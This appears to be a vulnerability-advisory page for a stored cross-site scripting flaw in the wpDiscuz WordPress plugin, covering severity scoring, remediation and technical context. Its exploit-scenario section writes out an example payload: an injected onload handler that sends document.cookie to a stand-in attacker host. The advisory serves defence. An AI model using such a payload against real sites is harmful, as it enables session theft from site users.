Vulnerability Assessment
| Weakness |
CWE
OWASP Top 10:2025
A05:2025 - Injection
ASVS 5.0
V1 - Encoding and Sanitization Output encoding, context-aware escaping
MITRE ATT&CK
2 techniques across 2 tactics: Initial Access, Execution The technique list with ATT&CK links and the kill-chain view is part of the Basic plan and up. |
| Impact | The CVSS v3.1 score of 4.4 reflects moderate severity with a low-complexity attack that requires authenticated access (PR:L) and user interaction (UI:R), affecting confidentiality and integrity but not availability. The CVSS vector indicates network accessibility (AV:N) but high attack complexity (AC:H), which somewhat mitigates the impact. The moderate CVSS score accurately reflects real-world risk: while the vulnerability is exploitable, it requires an attacker to have at least contributor-level WordPress privileges and victims must view malicious comments. Without confirmed KEV (CISA Known Exploited Vulnerabilities) status or public proof-of-concept code, this should be treated as a medium-priority remediation target rather than critical. Organizations running older wpDiscuz versions with strict user role management and comment moderation should prioritize patching within their normal maintenance windows, but this does not warrant emergency incident response. |
| Exploit ScenarioDerived | An authenticated attacker with contributor-level access creates a comment with an attachment record containing a malicious URL such as an img tag with a crafted src attribute like 'x" onload="fetch('https://attacker.com/steal?cookie='+document.cookie)'. When a site administrator or other WordPress user views the comment thread, the unescaped JavaScript executes in their browser, exfiltrating their session cookie to the attacker's server. The attacker then uses the stolen session to perform administrative actions. While this requires authentication and user interaction, it can be highly effective in multi-user WordPress environments where comment moderation is less strict. |
Get an e-mail when this CVE is exploited, patched or re-scored. Free account.
Alert meAnalysisAIv1 – Mar 13, 2026
wpDiscuz before version 7.6.47 contains a stored cross-site scripting (XSS) vulnerability in the WpdiscuzHelperUpload class that fails to properly escape attachment URLs when rendering HTML output. Attackers with limited privileges (contributor level or higher) can inject malicious JavaScript through crafted attachment records or WordPress filter hooks, which executes in the browsers of any WordPress user viewing the affected comments. This vulnerability requires user interaction (victim must view the comment) and has moderate real-world impact due to the authentication requirement and user interaction factor, though successful exploitation could lead to session hijacking or credential theft from comment viewers.
RemediationAI
Upgrade wpDiscuz to version 7.6.47 or later immediately using the WordPress plugin update interface or by manually downloading the patched version from the official WordPress plugin repository. The update process is straightforward: navigate to Plugins → Installed Plugins, locate wpDiscuz, and click the Update button if available. As a temporary mitigation until patching is feasible, restrict comment permissions to trusted users only, enable strict comment moderation to review all comments before publication, and disable attachment uploads in comments if the feature is not essential. Additionally, implement Content Security Policy (CSP) headers on your WordPress installation to mitigate XSS impact by restricting script execution, and monitor user accounts with contributor or higher privileges for unauthorized activity.
Affected VersionsENISA
Affected Packages
Source: OSV (Open Source Vulnerabilities)
Affects your stack
Affects 1 package in euvd
Checking this CVE against your own stacks and servers is part of the Basic plan and up.
Technical ContextAI · show details
The vulnerability resides in the WpdiscuzHelperUpload class within the wpDiscuz WordPress plugin, a popular comment system enhancement. The root cause is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation, also known as Cross-site Scripting), which occurs when user-controlled data is rendered in HTML attributes without proper escaping or sanitization. The affected code fails to use WordPress escaping functions (such as esc_url, esc_attr, or wp_kses_post) when outputting attachment URLs into img and anchor tag attributes within comment HTML. The attack vector is network-based, leveraging WordPress's comment and attachment infrastructure, with the exploit requiring low-complexity manipulation of attachment metadata or filter hook parameters.
Know when Wpdiscuz gets its next vulnerability
- Watch products and get an email when something new is published
- Check this CVE against your own stack and servers
- Exploit and PoC references, threat intelligence from 22 sources
No credit card · 7-day full trial
Severity by source
AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
Lifecycle Timeline
2DescriptionCVE.org
wpDiscuz before 7.6.47 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through unescaped attachment URLs in HTML output by exploiting the WpdiscuzHelperUpload class. Attackers can craft malicious attachment records or filter hooks to inject arbitrary JavaScript into img and anchor tag attributes, executing code in the context of WordPress users viewing comments.
Executive ViewAI
Organizations using wpDiscuz before 7.6.47 should be aware of moderate risk from CVE-2026-22210, a cross-site scripting vulnerability rated CVSS 4.4. Attackers could inject scripts to steal sessions or perform actions as authenticated users. A patch is available and should be applied during regular vulnerability management.
Apply vendor patch. If patching is delayed: implement CSP headers, enable HttpOnly cookies, deploy WAF XSS rules.
Threat Intelligence Overview
How this decision was reached
The engine reads each signal below and applies a fixed list of rules from top to bottom. The first rule that matches sets the recommended action – like a statement, every line is shown.
What every action level means
SSVC AssessmentENISA
Priority Score
Attack Technique
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
Related Vulnerabilities in wpDiscuz Multiple Security Vulnerabilities
View all 14A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allo
A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute
The Comments - wpDiscuz plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including
Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team Comments - wpDiscuz plugin <= 7.6.11 versions. Rated hi
Auth. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch
The Comments - wpDiscuz WordPress plugin through 7.3.0 does not properly sanitise or escape the Follow and Unfollow mess
The wpDiscuz WordPress plugin before 7.3.4 does check for CSRF when adding, editing and deleting comments, which could a
EUVD-2026-11751
NVD
CVE.org
EPSS
VulDB
GitHub PoC
Exploit-DB